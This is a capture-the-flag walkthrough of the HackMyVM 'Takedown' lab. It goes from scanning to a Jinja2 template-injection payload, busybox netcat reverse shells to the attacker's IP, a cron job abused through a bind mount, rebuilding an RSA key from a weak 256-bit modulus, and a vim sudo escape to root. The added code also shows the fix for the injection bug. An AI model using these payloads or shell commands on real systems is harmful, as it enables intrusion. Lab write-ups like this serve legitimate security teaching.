HackMyVM-Takedown-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
Password:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.155 08:00:27:f9:39:a8 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f5:9e:5f VMware, Inc.

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded
export ip=192.168.60.155
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.155:22
Open 192.168.60.155:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 21:38 CST
Initiating ARP Ping Scan at 21:38
Scanning 192.168.60.155 [1 port]
Completed ARP Ping Scan at 21:38, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:38
Scanning textpattern.dsz (192.168.60.155) [2 ports]
Discovered open port 80/tcp on 192.168.60.155
Discovered open port 22/tcp on 192.168.60.155
Completed SYN Stealth Scan at 21:38, 0.02s elapsed (2 total ports)
Nmap scan report for textpattern.dsz (192.168.60.155)
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-07-30 21:38:30 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:F9:39:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Visiting port 80 in a browser redirects to a domain name.

Add the domain to the hosts file:

echo "$ip shieldweb.che"|sudo tee -a /etc/hosts
192.168.60.155 shieldweb.che

Next, brute-force virtual hosts.

gobuster finds ticket.shieldweb.che (which needs its own hosts entry):

❯ gobuster vhost -u "shieldweb.che" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shieldweb.che
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: ticket.shieldweb.che Status: 200 [Size: 2131]

SSTI (server-side template injection)

The ticket page has an input form, so try it as an injection point.

image

Testing shows the Nombre: field reflects its input; entering admin, for example, echoes admin back.

image

Entering a template expression confirms SSTI. The {{ }} syntax and the fact that the payload below works (cycler is a Jinja2 built-in global) identify the engine as Jinja2.

image

Go straight for a shell with a Jinja2 payload that reaches os through the globals of the cycler class:

{{ cycler.__init__.__globals__.os.popen('busybox nc 192.168.60.100 4444 -e /bin/sh').read() }}
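What makes that payload work, as an added example (this is not the VM's application code or the walkthrough's own code): Jinja2 evaluates whatever string it is handed as template source, so concatenating the Nombre field into the template turns a greeting into code execution. Below are the vulnerable pattern, a fixed version that passes the input as a template variable, a sandboxed variant, and the arithmetic probe used to detect the bug. Only the field name Nombre comes from the page; the greeting text, function names and the harmless echo command substituted into the payload are assumptions.

```python
#!/usr/bin/env python3
"""Jinja2 SSTI: vulnerable pattern, detection probe, and two fixes.

Added example, not code from the target VM or the walkthrough.
"""
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Probe used during recon: a template engine evaluates it, a plain echo does not.
PROBE = "{{ 7*7 }}"

# Same shape as the walkthrough's payload, with the command swapped for a harmless echo.
RCE_PROBE = "{{ cycler.__init__.__globals__.os.popen('echo pwned').read() }}"


def greet_vulnerable(nombre: str) -> str:
    """Vulnerable: user input is spliced into the *template source*.
    This is what render_template_string("Hola " + nombre) does in Flask."""
    return Environment().from_string("Hola " + nombre).render()


def greet_fixed(nombre: str) -> str:
    """Fixed: the template is a constant and the input is only a *variable*,
    so {{ }} in the input is rendered as literal text."""
    env = Environment(autoescape=True)
    return env.from_string("Hola {{ nombre }}").render(nombre=nombre)


def greet_sandboxed(nombre: str) -> str:
    """Partial mitigation: still a template-injection bug, but the sandbox
    refuses attribute names starting with '_' (such as __init__/__globals__)."""
    return SandboxedEnvironment().from_string("Hola " + nombre).render()


def is_ssti(render, probe: str = PROBE, expected: str = "49") -> bool:
    """Detection check: True when the probe was evaluated rather than echoed back."""
    try:
        out = render(probe)
    except Exception:
        return False
    return expected in out and probe not in out


def sandbox_blocks_rce(nombre: str = RCE_PROBE) -> bool:
    """True when the sandboxed environment stops the dunder-walking payload."""
    try:
        greet_sandboxed(nombre)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", is_ssti(greet_vulnerable), repr(greet_vulnerable(RCE_PROBE)))
    print("fixed:     ", is_ssti(greet_fixed), repr(greet_fixed(PROBE)))
    print("sandboxed: ", sandbox_blocks_rce())
```

The fix that matters is greet_fixed: never build template source from request data. The sandbox is defence in depth only; it still renders attacker-controlled templates and has had bypasses in the past.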

User privilege escalation

Start a listener on the port.

The shell comes back as root, but it is clearly inside a Docker container (hostname Ariel, working directory /app, address 172.21.0.2):

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Ariel-192.168.60.155-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Ariel~192.168.60.155_Linux_x86_64/2025_07_30-21_45_46-325.log 📜
───────────────────────────────────────────────────────────────────────────
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # hostname -i
172.21.0.2

The container also holds some log files the author left behind deliberately:

/var/log # ls -al
total 16
drwxr-xr-x 2 root root 4096 Jun 23 15:30 .
drwxr-xr-x 11 root root 4096 Jun 25 09:48 ..
-rw-r--r-- 1 root root 980 Jun 23 15:29 access.yml
-rw-r--r-- 1 root root 123 Jun 23 15:29 chat
/var/log # cat chat
Kevin: Love be careful what you do.
A.love: I don't know Kevin, it's just a moment.
Kevin: Remove that now.
A.Love: Go to.
/var/log # cat access.yml
2023-08-31 10:15:42 - Usuario: jsmith - Accion: Inicio de sesion exitoso
2023-08-31 11:20:18 - Usuario: a_doe - Accion: Acceso a la carpeta /datos/confidenciales
2023-08-31 12:45:29 - Usuario: s_miller - Accion: Intento de acceso no autorizado
2023-08-31 14:30:05 - Usuario: jdoe - Accion: Creación de archivo nuevo_reporte.txt
2023-08-31 15:10:22 - Usuario: r_jones - Accion: Cierre de sesion

2023-08-31 16:55:11 - Usuario: l_smith - Accion: Edicion de archivo informe_trimestral.docx
2023-08-31 18:02:45 - Usuario: jbrown - Accion: Eliminacion accidental del archivo importante.pdf
2023-08-31 19:40:30 - Usuario: c_wilson - Accion: Copia de archivos a la carpeta compartida /datos/publicos
2023-08-31 20:15:17 - Usuario: m_johnson - Accion: Cambio de contrasena exitoso
2023-08-31 21:30:59 - Usuario: k_adams - Accion: Descarga de archivo confidencial_backup.zip

2023-08-31 22:45:00 - Usuario: A.love - Accion: Tarea cron ejecutada: */5 * * * * root bash /home/love/script/*

The entries in access.yml are Spanish access-log lines; the one that matters is the last: user A.love, "cron task executed", as root every five minutes, bash /home/love/script/*.

Setting up a TUN tunnel

sudo ./proxy -selfcert
Password:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » interface_create --name docker
INFO[0008] Creating a new "docker" interface...
INFO[0008] Interface created!
ligolo-ng » INFO[0038] Agent joined. id=13b87b1e-14da-4a93-84ed-e8d87d867409 name=root@Ariel remote="192.168.60.155:50132"
ligolo-ng » session
? Specify a session : 1 - root@Ariel - 192.168.60.155:50132 - 13b87b1e-14da-4a93-84ed-e8d87d867409
[Agent : root@Ariel] » tunnel_start --tun docker
[Agent : root@Ariel] » INFO[0049] Starting tunnel to root@Ariel (13b87b1e-14da-4a93-84ed-e8d87d867409)
-------------------------
# on the attacker host, once the tunnel is up:
sudo ip route add 172.21.0.0/24 dev docker
--------------------------
# in the container:
/tmp/toolkit-YljkSuqG # ./ligolo_agent --connect 192.168.60.100:11601 --ignore-cert &
/tmp/toolkit-YljkSuqG # WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.60.100:11601"

In hindsight the tunnel is not needed: the path to the host goes through a bind mount, not the network.

Cron job

The log above shows that a user love exists and that root periodically runs whatever is in /home/love/script.

Inspecting the container's mounts shows the host's /home/love/script is bind-mounted at /script inside the container.

image

Drop any script into it and within five minutes the cron job runs it and a shell comes back. One caveat about the glob: bash expands /home/love/script/* in sorted order, runs only the first match as the script and passes the remaining matches as positional arguments, so name the file so that it sorts first (a.sh does). chmod +x is harmless but unnecessary, since bash reads the file rather than executing it.
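The mount check the screenshot above shows, done in code, as an added example (not the walkthrough's own tooling): read /proc/mounts and keep only mount points that sit on a real host filesystem, are not the overlay root and are not the three files Docker injects into every container. The sample lines are constructed to mirror a Docker container with one extra bind mount; the device names and overlay paths in them are made up.

```python
#!/usr/bin/env python3
"""Find host paths bind-mounted into a container by reading /proc/mounts.

Added example, not from the walkthrough. Sample lines below are constructed
to look like a Docker container with one extra bind mount (/script).
"""

# Filesystem types that are container/kernel plumbing rather than host data.
VIRTUAL_FSTYPES = {
    "proc", "sysfs", "tmpfs", "devpts", "mqueue", "cgroup", "cgroup2",
    "overlay", "devtmpfs", "shm", "securityfs",
}

# Docker bind-mounts these three files from the host into every container;
# they are real bind mounts but useless for an escape.
DOCKER_DEFAULT_BINDS = {"/etc/resolv.conf", "/etc/hostname", "/etc/hosts"}

# Constructed sample of /proc/mounts (device mountpoint fstype options dump pass).
SAMPLE_PROC_MOUNTS = """\
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/X,upperdir=/var/lib/docker/overlay2/abc/diff,workdir=/var/lib/docker/overlay2/abc/work 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 /script ext4 rw,relatime 0 0
/dev/sda1 /etc/resolv.conf ext4 rw,relatime 0 0
/dev/sda1 /etc/hostname ext4 rw,relatime 0 0
/dev/sda1 /etc/hosts ext4 rw,relatime 0 0
"""


def parse_proc_mounts(text):
    """Yield (device, mountpoint, fstype, option-set) per /proc/mounts line.
    The kernel escapes spaces in paths as \\040, so decode that."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        dev, mnt, fstype, opts = fields[:4]
        yield dev, mnt.replace("\\040", " "), fstype, set(opts.split(","))


def candidate_bind_mounts(text):
    """Mount points worth a look for container escape: on a real filesystem,
    not the container root, not Docker's default injected files.
    Returns a list of (mountpoint, writable) tuples."""
    found = []
    for dev, mnt, fstype, opts in parse_proc_mounts(text):
        if fstype in VIRTUAL_FSTYPES or mnt == "/" or mnt in DOCKER_DEFAULT_BINDS:
            continue
        found.append((mnt, "rw" in opts))
    return found


if __name__ == "__main__":
    # On a live target: candidate_bind_mounts(open("/proc/mounts").read())
    for mnt, writable in candidate_bind_mounts(SAMPLE_PROC_MOUNTS):
        print(f"{mnt} ({'writable' if writable else 'read-only'})")
```

A writable hit like /script is only interesting because something on the host consumes it; here the cron line from access.yml is what turns a bind mount into root code execution on the host.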

There is a hint in the user's home directory:

/script # echo "busybox nc 192.168.60.100 4444 -e /bin/bash">a.sh
/script # chmod +x a.sh
[!] Session detached ⇲

(Penelope)─(Session [1])> interact 2
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/2025_07_30-22_20_02-261.log 📜
love@osiris:~$ cat note.txt
A.love:

Kevin this is a good icebreaker

we have icebreaker

jajajajjaja

S.A.S.

There is also another directory under /opt:

love@osiris:/opt/Contempt$ ls -al
total 24
drwxr-xr-x 2 root root 4096 jun 28 19:09 .
drwxr-xr-x 3 root root 4096 ago 31 2023 ..
-rwx------ 1 root root 5722 jun 28 19:01 Contempt
-rw-r--r-- 1 root root 182 jun 2 2024 HELP
-rw-r--r-- 1 root root 1065 jun 26 2023 LICENSE
love@osiris:/opt/Contempt$ cat HELP
Estos son los comandos disponibles:
- RCE: Ejecucion remota de comandos
- exploit: Ejecutar Exploit para intrusion al Servidor
- worm: Desplegar gusano para infectar el Servidor
Translation:
These are the available commands:
- RCE: remote command execution
- exploit: run an exploit to break into the server
- worm: deploy a worm to infect the server

Sudo privilege escalation

love is allowed to run /home/mitnick/sas as mitnick through sudo, without a password.

sas has a run <filename> command, so a script written by love is executed as mitnick. Strictly speaking this step is optional, because everything needed from mitnick's home directory can be read without it (see below).

love@osiris:~$ sudo -l
Matching Defaults entries for love on osiris:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User love may run the following commands on osiris:
(mitnick) NOPASSWD: /home/mitnick/sas
love@osiris:~$ echo 'busybox nc 192.168.60.100 4444 -e /bin/bash' > a.sh
love@osiris:~$ chmod +x a.sh
love@osiris:~$ sudo -u mitnick /home/mitnick/sas
SSSSS AAA SSSSS
S S A A S S
S A A S
SSSSS A A SSSSS
S ### AAAAAAA ### S
S S ### A A ### S S
SSSSS A A SSSSS
SAS v1.0
(c) SWITCHED ACCESS SERVICES 2023 Aquilino Morcillo

sas -h Available commands
# sas -h
Available commands:
sas_call - listen to Services
ls - List files and directories
cat <filename> - Display contents of a file
whoami - Show current user
sas help (-h) - Show available commands
version (-v) - Show application version
run <filename> - Execute a file
dir - Show the content of the current directory in wide format
# run a.sh
[+] Got reverse shell from osiris-192.168.60.155-Linux-x86_64 😍️ Assigned SessionID <4>
(Penelope)─(Session [2])> interact 4
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/2025_08_25-00_15_40-154.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
mitnick@osiris:/home/love$ id
uid=1003(mitnick) gid=1003(mitnick) grupos=1003(mitnick)
mitnick@osiris:/home/love$ cd ~
mitnick@osiris:~$ ls
publickey.pub sas secret.enc

(The escalation is optional because this user's home directory is readable by other users.)

Decrypting secret.enc

The home directory holds publickey.pub and secret.enc, so the task is to decrypt secret.enc.

mitnick@osiris:~$ cat publickey.pub
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMov+hb0LOJW4z6w03Tv8yNswYDXkEMj
DJE46jQH3sERAgMBAAE=
-----END PUBLIC KEY-----
mitnick@osiris:~$ file secret.enc
secret.enc: data

The public key is tiny: the modulus is only 256 bits (77 decimal digits), which is trivially factorable, so the private key can be rebuilt from p and q.

For details see HackMyVM-Hell-Walkthrough | Pepster's Blog

[!] Session detached ⇲

(Penelope)─(Session [4])> download publickey.pub
[+] Download OK '/home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/downloads/home/mitnick/publickey.pub'
(Penelope)─(Session [4])> download secret.enc
[+] Download OK '/home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/downloads/home/mitnick/secret.enc
❯ cd /home/Pepster/.penelope/osiris~192.168.60.155_Linux_x86_64/downloads/home/mitnick/
❯ python3 exp.py
[+]e==>65537
[+]n==>91451963281284582263822096491513116919368195592939782118118773662653066690833
The script below (labelled exp.py in the original post; the session further down runs it as exp2.py) rebuilds the private key. p and q are the two factors of n; the factoring step itself is not shown on this page, see the Hell walkthrough linked above.

#!/usr/bin/python3
from Crypto.PublicKey import RSA   # pycryptodome

# n and e come from the public key; p and q are its factors (n is only 256 bits)
n = 91451963281284582263822096491513116919368195592939782118118773662653066690833
e = 65537
p = 272799705830086927219936172916283678397
q = 335234831001780341003153415948249295589

# phi(n) = (p-1)(q-1) = n - (p + q - 1)
m = n - (p + q - 1)

def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)

def modinv(a, m):
    """Modular inverse of a mod m; raises if gcd(a, m) != 1."""
    g, x, y = egcd(a, m)
    if g != 1:
        raise ValueError("modular inverse does not exist")
    return x % m

d = modinv(e, m)   # private exponent: e*d == 1 (mod phi(n))

key = RSA.construct((n, e, d, p, q))
print(key.exportKey().decode())

Running the script yields the private key:

❯ python3 exp2.py|tee id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIGrAgEAAiEAyi/6FvQs4lbjPrDTdO/zI2zBgNeQQyMMkTjqNAfewRECAwEAAQIh
AK3yTsf2tLLZq9IgkRv24AbdmxAYvRgmyA/I66tUb+SRAhEAzTtP7imRDzra1nQc
iVoevQIRAPwz4UPuS1/rYZM0Z6+TauUCEEApf+a8dg5l3w7WxCko1J0CEQDNdEIm
AeF7kZhawE1bdh+VAhA2aIpbJ2l3E4AlMpOlMIo6
-----END RSA PRIVATE KEY-----

With the private key in hand, decrypt secret.enc (openssl pkeyutl's default RSA padding, PKCS#1 v1.5, is the right one here):

❯ openssl pkeyutl -decrypt -in secret.enc -inkey id_rsa -out decrypted.txt
❯ cat decrypted.txt
sh1m0mur4Bl4ckh4t
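The whole key-recovery chain in one dependency-free script, as an added example (not the walkthrough's exp.py/exp2.py, which rely on pycryptodome): parse n and e out of publickey.pub with a minimal DER walker (this is what the first exp.py printed), derive d from the factors p and q listed above after checking that p*q really equals n, and demonstrate a textbook-RSA round trip with the recovered d. The public key and the factors are the ones from the page; the plaintext used in the round trip is constructed (it reuses the recovered password as sample data), and the round trip is raw RSA without the PKCS#1 v1.5 padding that openssl pkeyutl strips from the real secret.enc, so it shows the core of the operation rather than replacing openssl. Requires Python 3.8+ for pow(e, -1, phi).

```python
#!/usr/bin/env python3
"""Recover an RSA private exponent from a factored 256-bit modulus.

Added example, not part of the original walkthrough. Pure Python, no
pycryptodome needed.
"""
import base64

# Public key exactly as found in /home/mitnick/publickey.pub on the target.
PUBKEY_PEM = """-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMov+hb0LOJW4z6w03Tv8yNswYDXkEMj
DJE46jQH3sERAgMBAAE=
-----END PUBLIC KEY-----"""

# Factors of the 256-bit modulus, as listed in the walkthrough.
P = 272799705830086927219936172916283678397
Q = 335234831001780341003153415948249295589


def _der_tlv(buf: bytes, pos: int):
    """Parse one DER tag-length-value at pos; return (tag, value, next_pos).
    Handles short-form and multi-byte long-form lengths."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key(pem: str):
    """Extract (n, e) from a SubjectPublicKeyInfo PEM ('BEGIN PUBLIC KEY')."""
    body = "".join(l for l in pem.strip().splitlines() if not l.startswith("-----"))
    der = base64.b64decode(body)
    tag, spki, _ = _der_tlv(der, 0)          # SubjectPublicKeyInfo ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _algid, pos = _der_tlv(spki, 0)       # AlgorithmIdentifier (rsaEncryption, NULL)
    tag, bitstr, _ = _der_tlv(spki, pos)     # subjectPublicKey BIT STRING
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("unexpected BIT STRING")
    _, rsakey, _ = _der_tlv(bitstr, 1)       # RSAPublicKey ::= SEQUENCE { n, e }
    _, n_bytes, pos = _der_tlv(rsakey, 0)
    _, e_bytes, _ = _der_tlv(rsakey, pos)
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def recover_private_exponent(n: int, e: int, p: int, q: int) -> int:
    """d = e^-1 mod (p-1)(q-1); refuses factors that do not multiply to n."""
    if p * q != n:
        raise ValueError("p*q != n: wrong factors for this modulus")
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


def rsa_roundtrip(n: int, e: int, d: int, message: bytes) -> bytes:
    """Textbook RSA (no padding): encrypt with (n, e), decrypt with d."""
    m = int.from_bytes(message, "big")
    if m >= n:
        raise ValueError("message too long for this modulus")
    c = pow(m, e, n)
    size = (n.bit_length() + 7) // 8
    return pow(c, d, n).to_bytes(size, "big").lstrip(b"\x00")


if __name__ == "__main__":
    n, e = parse_rsa_public_key(PUBKEY_PEM)
    print(f"n bits = {n.bit_length()}, e = {e}")
    d = recover_private_exponent(n, e, P, Q)
    print("round trip:", rsa_roundtrip(n, e, d, b"sh1m0mur4Bl4ckh4t"))  # constructed sample
```

The n.bit_length() output is the whole story: 256-bit RSA is below the size that general-purpose factoring tools handle in seconds, so once the modulus is factored the private key follows from one modular inverse.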

Root privilege escalation

The decrypted string is tomu's password; switch to that user:

mitnick@osiris:/home$ su tomu
Contraseña:
tomu@osiris:/home$ id
uid=1001(tomu) gid=1001(tomu) grupos=1001(tomu)
tomu@osiris:/home$ cd ~
tomu@osiris:~$ ls
nokitel.md nokitel.png user.txt
tomu@osiris:~$ cat user.txt
612701a03669485d94bc687449fdab39

tomu has a sudo entry:

tomu@osiris:~$ sudo -l
[sudo] password for tomu:
Matching Defaults entries for tomu on osiris:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomu may run the following commands on osiris:
(root) /opt/Contempt/Contempt
tomu@osiris:~$ sudo /opt/Contempt/Contempt

This opens a menu interface; choosing the second option drops into vim.

image

Escalate the usual way: from vim's command-line mode run :!/bin/bash, which spawns a shell as root because vim itself is running under sudo.

root@osiris:/home/tomu# id
uid=0(root) gid=0(root) grupos=0(root)
root@osiris:/home/tomu# cat /root/root.sh
#!/bin/sh

clear

greenColour="\e[0;32m\033[1m"
endColour="\033[0m\e[0m"

printf "\n${greenColour}███████╗██████╗ ███████╗███████╗ ███╗ ███╗██╗████████╗███╗ ██╗██╗ ██████╗██╗ ██╗"
printf "\n${greenColour}██╔════╝██╔══██╗██╔════╝██╔════╝ ████╗ ████║██║╚══██╔══╝████╗ ██║██║██╔════╝██║ ██╔╝"
printf "\n${greenColour}█████╗ ██████╔╝█████╗ █████╗ ██╔████╔██║██║ ██║ ██╔██╗ ██║██║██║ █████╔╝ "
printf "\n${greenColour}██╔══╝ ██╔══██╗██╔══╝ ██╔══╝ ██║╚██╔╝██║██║ ██║ ██║╚██╗██║██║██║ ██╔═██╗ "
printf "\n${greenColour}██║ ██║ ██║███████╗███████╗ ██║ ╚═╝ ██║██║ ██║ ██║ ╚████║██║╚██████╗██║ ██╗"
printf "\n${greenColour}╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝╚═╝ ╚═╝\n${endColour}"
printf "\t\nflag --> 1e271c5ce97e76ae8417a95c74085fba \n"